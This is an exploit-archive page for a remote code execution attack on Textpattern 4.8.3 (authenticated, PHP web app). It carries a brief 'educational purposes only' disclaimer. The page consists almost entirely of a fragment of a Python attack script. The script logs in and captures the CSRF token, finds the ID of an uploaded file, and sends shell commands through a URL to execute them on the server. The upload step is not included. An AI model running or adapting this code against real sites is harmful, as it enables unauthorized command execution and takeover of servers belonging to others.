Exploits / Vulnerability Discovered : 2021-03-04 |
Type : webapps |
Platform : php
This exploit / vulnerability Textpattern 4.8.3 remote code execution (authenticated) (2) is for educational purposes only and if it is used you will do on your own risk!
def get_file_id(s, files_url, file_name):
r = s.get(files_url, verify=False)
soup = BeautifulSoup(r.text, "html.parser")
for a in soup.findAll('a'):
if "file_download/" in a['href']:
file_id_name = a['href'].split('file_download/')[1].split("/")
if file_id_name[1] == file_name:
file_id = file_id_name[0]
return file_id
def login(login_url, user, password):
s = requests.Session()
s.get(login_url, verify=False)
data = {"p_userid":user, "p_password":password, "_txp_token":""}
r = s.post(login_url, data=data, verify=False)
if str(r.status_code) == "401":
print("[+] Invalid credentials")
sys.exit(0)
_txp_token = ""
soup = BeautifulSoup(r.text, "html.parser")
fields = soup.findAll('input')
for f in fields:
if (f['name'] == "_txp_token"):
_txp_token = f['value']
return s,_txp_token
def exec_cmd(s, cmd_url, command):
r = s.get(cmd_url+command, verify=False)
response = r.text.replace("<a>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed eiusmod tempor incidunt ut labore et dolore magna aliqua.</a>\n","")
return response